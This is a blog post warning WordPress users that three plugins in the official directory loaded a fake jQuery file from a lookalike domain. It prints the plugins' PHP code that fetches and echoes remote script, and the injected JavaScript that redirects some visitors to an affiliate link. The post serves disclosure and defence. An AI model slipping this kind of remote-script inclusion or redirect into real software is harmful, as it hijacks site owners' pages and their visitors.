Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

We received an email today from a WordPress user who wanted to alert us to a jQuery hack.  At first, I’ve got to admit, I was a little bit sceptical but I thought it was worth looking in to. I was surprised by what I found.

We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.

Normally a WordPress plugin will get jQuery from just a few places:

  • Google CDN
  • WordPress itself
  • Microsoft CDN
  • jQuery CDN

But what if you had a plugin that was getting it’s jQuery from http://j-query.org?

That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.

Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?

No, they’re not. And http://j-query.org isn’t even registered by the people at jquery. It’s registered with domains by proxy, and forwards to servers at Media Temple.

So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:

if(function_exists('curl_init'))
	{
		$url = "http://www.j-query.org/jquery-1.6.3.min.js";
		$ch = curl_init();
		$timeout = 5;
		curl_setopt($ch,CURLOPT_URL,$url);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
		$data = curl_exec($ch);
		curl_close($ch);
		echo "$data";
	}
}

There are three plugins containing this code. They are:

All three of these plugins are from the same person – iintensemedia who runs the site Iintense Media (also registered by domain by proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).

Let’s take a look at one of these in trac:

Quick coupon in the WordPress repo

Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”

Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.

1. The First Clue

Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:

<script type = "text/javascript">
var now = new Date().getTime();
if (now%8 == 0) {
window.location = "http://trk.cpainfinity.com/SHD1";
}
</script>

How does the dev respond?

FREE EBOOK
Your step-by-step roadmap to a profitable web dev business. From landing more clients to scaling like crazy.

By downloading this ebook I consent to occasionally receive emails from WPMU DEV.
We keep your email 100% private and do not spam.

FREE EBOOK
Plan, build, and launch your next WP site without a hitch. Our checklist makes the process easy and repeatable.

By downloading this ebook I consent to occasionally receive emails from WPMU DEV.
We keep your email 100% private and do not spam.

2. The Plot Thickens

That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.

The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was propogating this site with CPA Infinity Affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.

Which means that someone has been making money with some fake http://j-query.org site which is fooling people into thinking that they’re getting some delicious jQuery but they’re actually sending about 1 in every 8 of your visitors to the CPA Infinity link.

Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.

Update: A commenter has noted this link.

the link leads to a black hat seo page

Who’s behind it?

Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:

[blackbirdpie url=”http://twitter.com/#!/iintense/status/124490755342483456″]

What’s the Moral of the Story?

Well kids, every good story has got a good moral, and this one does too.

The WordPress Plugin Directory is not infalliable. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately it’s the case that while the Theme Directory has got strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves) but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.

Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)

Were you affected by any of these plugins? We’d love to hear your story in the comments.

Tags: